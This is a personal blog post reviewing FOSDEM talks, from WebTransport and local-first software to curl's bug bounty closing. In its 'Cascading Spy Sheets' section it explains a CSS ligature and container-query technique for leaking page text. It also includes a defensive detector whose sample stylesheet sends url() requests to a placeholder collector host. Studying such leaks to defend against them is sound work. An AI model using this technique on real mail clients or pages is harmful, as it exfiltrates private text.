Late last year I finally had the chance to attend the Matrix conference; I had missed the year before due to running out of days on my Schengen visa. That was a blast, and as soon as I got home I wanted to find the next thing to attend. Then I spotted that the Free and Open-source Software Developers’ European Meeting, better known as FOSDEM, was taking place in only a few months. So I hastily organised a few friends and an Airbnb and stuck it in the diary. I had a skim of the schedule and was amazed at the sheer volume of things going on in only two days. The Matrix conference seemed like a walk in the park in comparison.

Fast forward to last weekend: it was a sleepy morning getting the early Saturday Eurostar to Brussels. We found our Airbnb, checked in, and got on the tram to the conference. As we got closer to the venue, we kept spotting people who were here to attend FOSDEM. Easily identifiable features include: tech t-shirts, dot-matrix name tags, laptop stickers, the whole lot. Throughout the whole weekend I was constantly surprised and impressed by the sheer scale of the conference; the Université Libre de Bruxelles (ULB) campus had so many nooks and crannies, cafés, cafeterias and food trucks. Every seat, every table and seemingly almost every square foot of standing area was packed with people. A friend later told me there were 15000 attendees. The FOSDEM team are seriously impressive; admission was free, and not only that, but there was no way to ‘get’ a ticket, you just show up. That means that the organisers also have no indication of the amount of people coming, but despite all that everything ran incredibly smoothly. We always eventually found food and a place to sit when we needed it, and only ended up missing a few talks due to the rooms being over capacity.

I regret not recording my experience with the Matrix conference last year, so I’m turning that around with FOSDEM! Here’s a few talks and other experiences I had that I thought were worth sharing!

WebTransport

The first talk we got into was titled “Intro to WebTransport - the next WebSocket?” by Max Inden, an engineer working on Firefox. I had heard of WebTransport before but never knew what it was; this talk is a great intro to why WebSockets aren’t always enough and how WebTransport addresses those needs.

It mostly revolves around two main problems that WebSocket has:

  • Head-of-line blocking - A WebSocket connection is a stream, meaning every byte sent down it is delivered in a particular order. However, this means that if a packet of information earlier in the stream is lost, the rest of the stream behind it may have to wait for that packet to be retransmitted. This might be what you want, but often it means your device has already received data that it could be doing something with, yet it isn’t handed to the application until the earlier data is properly received (to preserve ordering).
  • Reliability - This one is a bit counter-intuitive if you’ve not heard about it before, but WebSockets are too darn reliable. I’ll explain with an example: say you’re watching a live-stream of your favourite creator; the packets containing video information are sent to your device and decoded for your viewing pleasure. This data is time-sensitive: if the server sends you data for a particular frame and it doesn’t arrive on time, then there’s no point resending that data to your device, since chances are your device has already moved past that frame onto the following frames. The dropped packets are stale. The resending of packets in reliable channels is sometimes wasted work; WebTransport lets you send data ‘unreliably’, where you essentially say “Send this packet, maybe it arrives, maybe it doesn’t, but don’t care about that and especially don’t retransmit!”.
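To make the two problems concrete, here is an added example (my own simulation, not code from Max’s talk or from any WebTransport implementation) that models the receive side of a reliable, ordered stream next to the receive side of an unreliable datagram channel. The packet sequence, the lost frame and the “stale if older than what I’ve already shown” policy are all constructed for the example; nothing here touches the network.

```javascript
// Added example: compare what an application sees from a reliable, ordered
// stream (WebSocket-style) versus unreliable datagrams (WebTransport-style)
// when one packet is lost and retransmitted late. All input is constructed.

// Reliable ordered stream: packets are handed to the application strictly in
// sequence. A gap stalls everything behind it until the missing packet is
// retransmitted (head-of-line blocking).
class OrderedStreamReceiver {
  constructor() {
    this.nextSeq = 0;        // sequence number the application is waiting for
    this.buffer = new Map(); // out-of-order packets parked until the gap closes
    this.delivered = [];     // what the application has actually seen, in order
  }
  receive(pkt) {
    this.buffer.set(pkt.seq, pkt);
    // drain everything that is now contiguous with what was already delivered
    while (this.buffer.has(this.nextSeq)) {
      this.delivered.push(this.buffer.get(this.nextSeq));
      this.buffer.delete(this.nextSeq);
      this.nextSeq++;
    }
  }
  stalled() { return this.buffer.size; } // packets held back by a gap
}

// Unreliable datagrams: each packet is handed over as soon as it arrives and
// the application decides whether it is still useful. Here a frame older than
// the newest frame already shown is stale and is simply discarded.
class DatagramReceiver {
  constructor() { this.newestFrame = -1; this.delivered = []; this.dropped = []; }
  receive(pkt) {
    if (pkt.seq < this.newestFrame) { this.dropped.push(pkt); return; }
    this.newestFrame = pkt.seq;
    this.delivered.push(pkt);
  }
}

// Constructed arrival order for video frames 0..5: frame 2 is lost in transit
// and its retransmission only arrives after frames 3, 4 and 5.
const ARRIVALS = [
  { seq: 0, frame: 'f0' }, { seq: 1, frame: 'f1' },
  { seq: 3, frame: 'f3' }, { seq: 4, frame: 'f4' }, { seq: 5, frame: 'f5' },
  { seq: 2, frame: 'f2' }, // late retransmission
];

// Feed the first `upTo` arrivals to both receivers and report what each
// application would have seen at that point.
function simulate(arrivals, upTo) {
  const stream = new OrderedStreamReceiver();
  const dgram = new DatagramReceiver();
  for (const pkt of arrivals.slice(0, upTo)) { stream.receive(pkt); dgram.receive(pkt); }
  return {
    streamDelivered: stream.delivered.map(p => p.frame),
    streamStalled: stream.stalled(),
    datagramDelivered: dgram.delivered.map(p => p.frame),
    datagramDropped: dgram.dropped.map(p => p.frame),
  };
}

// Before the retransmission (5 packets in): the stream has shown f0,f1 and is
// sitting on f3,f4,f5; the datagram path has already shown f0,f1,f3,f4,f5.
console.log('before retransmission', simulate(ARRIVALS, 5));
// After: the stream finally releases f2..f5 in order; the datagram path throws
// the stale f2 away because f5 has already been displayed.
console.log('after retransmission', simulate(ARRIVALS, 6));
```

The `streamStalled` count is the head-of-line cost: three perfectly good frames the device holds but cannot show. The `datagramDropped` list is the other side of the trade: the application, not the transport, decides that a late frame is worthless, which is exactly the choice WebTransport datagrams hand back to you.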

You can find Max’s website here¹, or the talk here.

Cascading Spy Sheets

This talk caught our eye as it seemed to be about using CSS to exfiltrate data; I seem to remember hearing about a keylogger in CSS a long time ago, so I was interested to see what the current state of the research was. This talk is definitely worth a watch, but I’m going to attempt to retell the most interesting attack.

Let’s say you have some way of controlling the CSS applied to text on a web page, but no way of reading the text directly. In the talk, their example was an email client that didn’t properly sandbox the CSS provided by emails. CSS provides ‘media queries’, which let you apply styling conditionally based on the size of the screen viewing the content; this is important as many websites change their styling based on whether you’re viewing them from a desktop, tablet, or mobile phone. CSS also has a more generic form of this called a ‘container query’, which lets you conditionally apply styling based simply on the size of the parent container of an element. If you combine this with a CSS property that can take a URL, for example the background image, you can now have the client conditionally send a web request depending on the size of an element’s container.

Okay, so you can tell how wide or tall an element’s container is, but that sounds pretty mundane. But what if you could turn text into a particular width, such that you can work backwards and work out the text given the width? Then you could potentially leak the text!

So it turns out that fonts can specify these things called ‘ligatures’, which is where sequences of characters are replaced by a single ‘ligature’. This is usually used stylistically, resolving edge cases of weird letter spacing or adding some extra flair to a font. It’s also used by programming fonts to give sequences like >= their own special character². The rules are somewhat arbitrary and decided by the font, meaning you can specify any sequence of characters to be ligature-ised. The important thing for us is that we can now take any arbitrary sequence of characters and replace them with a custom character, which most importantly can have a custom width. We have a way of turning a specific sequence of characters into a width! But for this to work we would have to give every possible combination of characters its own symbol with its own unique width, which quickly becomes untenable.

So the final piece of the puzzle, CSS animations! The general idea is like this:

  1. CSS animation is set to cycle the font through many URLs that you control at a sufficiently slow pace.
  2. The first font uses ligatures to give, say, each character of the alphabet a uniquely identifiable width, which combined with container queries can send a web request to the attacker server identifying that first character.
  3. After receiving what that character is, say it’s “h”, the server generates the second font on the fly, which generates ligatures for all the characters of the alphabet, but prefixed with “h”. i.e. “ha”, “hb”, “hc”. And now using container queries we can identify the second character.
  4. This process continues until an entire block of text is leaked!

Of course this explanation of mine glosses over some specifics, but if you want more details you should check out the talk here or their blog post here. As a side note, this approach of going character by character reminds me a lot of how you can use blind SQLi to dump database information, which is a favourite technique of mine!
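Looking at the same chain from the email client’s side, every link in it (a URL-taking property, a container or media query, a remote font, an animation) is something a renderer of untrusted CSS can refuse up front. The following is an added example of my own, not code from the talk, the researchers’ blog post, or any real mail client: a pre-render check that normalises an untrusted stylesheet and reports which of those constructs it contains. The rule list, the escape handling and the two sample stylesheets are constructed for this example.

```javascript
// Added example: flag the CSS constructs the leak described above depends on
// before rendering a stylesheet from an untrusted source (e.g. an email).
// Rules and samples are constructed; this is not any client's real sanitizer.

const RISKY_CONSTRUCTS = [
  { name: 'url()',      re: /\burl\s*\(/,                       why: 'any URL-taking property can trigger an outbound request' },
  { name: '@container', re: /@container\b/,                     why: 'turns an element size into a conditional request' },
  { name: '@media',     re: /@media\b/,                         why: 'does the same for viewport size' },
  { name: '@font-face', re: /@font-face\b/,                     why: 'a remote font can carry arbitrary ligature rules' },
  { name: '@import',    re: /@import\b/,                        why: 'pulls further stylesheets from the network' },
  { name: 'animation',  re: /\banimation(-[a-z]+)?\s*:|@keyframes\b/, why: 'cycles the font over time' },
];

// Undo two cheap ways of hiding a keyword from a naive string match:
// /* */ comments split across a keyword, and CSS hex escapes ("\75 rl(" is "url(").
function normaliseCss(css) {
  return css
    .replace(/\/\*[\s\S]*?\*\//g, '')                                     // strip comments
    .replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) =>                     // hex escapes
      String.fromCodePoint(parseInt(hex, 16)))
    .replace(/\\(.)/g, '$1')                                              // simple escapes
    .toLowerCase();
}

// Names of the risky constructs present in the stylesheet, in rule order.
function findRiskyConstructs(css) {
  const text = normaliseCss(css);
  return RISKY_CONSTRUCTS.filter(r => r.re.test(text)).map(r => r.name);
}

// Deny-by-default policy: untrusted CSS is rendered only if nothing was flagged.
function isSafeToRender(css) {
  return findRiskyConstructs(css).length === 0;
}

// Constructed sample: ordinary email styling with nothing to flag.
const BENIGN_EMAIL_CSS = `
  p { color: #333; font-family: Georgia, serif; }
  .signature { font-size: 12px; margin-top: 1em; }
`;

// Constructed sample combining the building blocks described above, with a
// hex-escaped and a comment-split "url(" to show why normalisation matters.
// The host is a placeholder, not a real collector.
const SUSPICIOUS_EMAIL_CSS = `
  @font-face { font-family: leak; src: \\75 rl(https://collector.example/font0.woff2); }
  @container (min-width: 120px) { .x { background: u/**/rl(https://collector.example/w120); } }
  .x { animation: cycle 30s steps(1) infinite; }
`;

console.log('benign:', findRiskyConstructs(BENIGN_EMAIL_CSS), isSafeToRender(BENIGN_EMAIL_CSS));
console.log('suspicious:', findRiskyConstructs(SUSPICIOUS_EMAIL_CSS), isSafeToRender(SUSPICIOUS_EMAIL_CSS));
```

This is a detection gate, not a parser: it tells you whether a stylesheet is worth rendering at all. A client that wants to keep some styling should go further and parse the CSS properly, keeping only an allowlist of properties and plain values, because a string-level check will always lag behind whatever the next obfuscation is.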

Towards a Local-first Linux Desktop

Local-first is one of those movements that I only discovered recently, but the more I learn about it the more it just seems like common sense. This talk was delivered by Tobias Bernard and Andreas Dzialocha, and mostly covered Modal, a software-building collective, and p2panda, a modular toolkit to build local-first and peer-to-peer apps. I feel like the most exciting thing about this talk for me was Modal’s design-first approach, and some of the designs they came up with for managing the cognitive load that peer-to-peer software can induce. I especially liked the idea of piggy-backing off the contacts app to give intuitive permissions management, somewhat like how Apple’s AirDrop or Google’s Nearby Share works. I’m definitely going to keep an eye on Modal, who are based in Berlin; all the cool tech stuff happens in Berlin! Check out Modal here and p2panda here. I will try to remember to link the talk once it’s available!

Lightning talks

FOSDEM speaker presenting a slide with the text “My grandma is now a linux user”

There were a few sessions of lightning talks throughout the weekend; I attended one towards the end of Sunday in the Janson lecture hall (which is humongous, by the way). In true lightning fashion I will try to give a one-sentence summary of each talk:

  1. CONTRIBUTING.yml - machine-readable contribution-related project info.
  2. Cyber Resilience Act (CRA) Misconceptions - the CRA is not as scary for open-source maintainers as I had originally read on HackerNews.
  3. Dumb guide to smart TVs - Modern TVs literally watch what you’re watching with Automatic Content Recognition (ACR), hack your TV with open OSes.
  4. Postgres Compatibility Index (PCI) - An automatic way to measure how compatible other projects are with Postgres; the speaker also has a fun blog.
  5. Pacman Cacheserver - Does what it says on the tin.
  6. EU Software Patents - Found it hard to follow this talk, but mostly concerned some of the legal battles behind software patents in the EU.
  7. GUI -> TUI - An absolutely wacky (and successful) attempt at rendering pixels as unicode squares in the terminal.
  8. Windows 10 EOL - Higher hardware requirement on Windows 11 leaves hundreds of millions of unsupported Windows 10 devices in the wild, including the speaker’s Grandma, who now uses Linux.
  9. Store your mail in git (Symig) - Mail-as-files, checked into git.
  10. RCL - Yet another configuration language, but with some functional goodness sprinkled in?
  11. gitify your life - A recurring talk summarising git-powered tools used by the speaker over the past several years.

As always, check out the talk here.

Open source security with AI

Or, in other words, “curl guy Daniel Stenberg (rightfully) complains about AI slop on their bug bounty program”. That is overly simplistic though; he makes some interesting observations about AI and open-source. One interesting remark was that AI isn’t the problem, rather humans are: AI is just a tool that can be brilliant in one person’s hands and destructive in another’s. He concluded the talk by sharing that the bug bounty program for curl, after many trials and tribulations, is now closed.

As a recovering bug-bounty-holic (with only one bug report to his name), it’s sad to see a bug bounty program close, when not too long ago the hype behind bug bounties seemed to be about how so many programs were opening up. I sincerely hope that when this bubble pops, or gracefully deflates, projects under the same people and monetary constraints as curl will be able to run bug bounties again. Watch the talk here.

Stands

Here and there between the talks I also checked out many of the booths and stands on offer, had many interesting conversations and of course collected many stickers. Here’s a brief list of some of those experiences:

  • Said hi to some of the Matrix folks, but also got to meet the XMPP folks and learn more about their tech and, crucially, how they differ from Matrix. It seems like the major difference is that Matrix is batteries-included and pretty laser-focused on the whole Discord/Slack market, whereas XMPP is more of a unix-philosophy ‘do one thing well’, adopting a modular approach, and it has the benefit of age with many major organisations relying on it.
  • Saw a 3D printed microscope, picked up a ‘You wouldn’t download a microscope’ sticker.
  • Got a cool keyring for having heard about DeepComputing and their RISC-V Framework mainboard before meeting them at the conference.
  • That the mustard indicates progress?
  • I was aware of Codeberg being a thing that existed and was like GitHub, but had no idea that they were fully donation funded and volunteer run, very cool!
  • Chatted to some people behind Overte, prompted by this cool binocular camera rig that one of them had. Seems like they were doing some experiments with 3D photos?
  • Learned about FOSSASIA and bought a dot-matrix name tag from them, seems like a very cool organisation!
  • Spent a while chatting with the Internet Archive Europe folks about their sister project the DWeb camp, which is coming to Europe this year! It seems to be some kind of nature getaway, but with power and good WiFi, and a combination of planned and spontaneous talks and workshops. I’m definitely going to try and attend it if I can make it work.

The Day After

a picture of the St. Michael and St. Gudula Cathedral

Our Eurostar back was in the afternoon on Monday, so we had the morning in Brussels to ourselves. We wandered for a bit and spontaneously went on a pay-what-you-want walking tour led by Estref (working for Adventours). If you’re ever in Brussels and can find this guy I would definitely recommend him; he showed us around the city and gave us lots of historical context and shared local legends, but of course made sure to draw the line between the two. We also had a chocolate treat from Elisabeth, which I would call a (Tunnock’s) Teacake, but it was much tastier.

Conclusion

Overall FOSDEM was a blast, I’m definitely going to try and come again next year.


  1. at time of writing he uses the same blog theme as me! ↩︎

  2. One example is Fira Code https://github.com/tonsky/FiraCode, or the default font used by the Zed editor. ↩︎